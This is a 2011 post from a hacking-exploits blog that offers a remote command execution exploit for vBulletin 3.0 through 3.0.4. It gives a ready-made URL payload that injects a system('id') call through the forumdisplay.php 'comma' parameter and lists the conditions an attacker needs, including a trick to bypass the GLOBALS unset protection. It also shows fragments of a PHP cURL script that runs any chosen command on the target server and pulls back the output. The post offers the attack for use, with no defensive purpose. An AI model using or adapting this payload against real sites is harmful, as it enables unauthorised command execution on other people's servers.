Saturday, August 6, 2011
Exploit:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." |
1st condition : $vboptions['showforumusers'] == True , the admin must set |
showforumusers ON in vbulletin options. |
2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest. |
3rd condition : $DB_site->fetch_array($forumusers) == True , when you |
visit the forums, it must has at least one user show the forum. |
4th condition : magic_quotes_gpc must be OFF |
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in |
init.php by secret array GLOBALS[]=1 ;)))
if (!(function_exists('curl_init'))) { |
echo "cURL extension required\n"; |
$forumid = intval($argv[2]); |
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n"; |
echo "Usage: ".$argv[0]." [proxy]\n\n"; |
echo " url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n"; |
echo " command to execute on server (ex: 'ls -la')\n"; |
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n"; |
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\""; |
$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."'; |
curl_setopt($ch, CURLOPT_PROXY,$proxy); |
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action); |
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); |
$res = substr($res, strpos($res, '_START_')+7); |
$res = substr($res,0, strpos($res, '_END_')); |
?>
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -
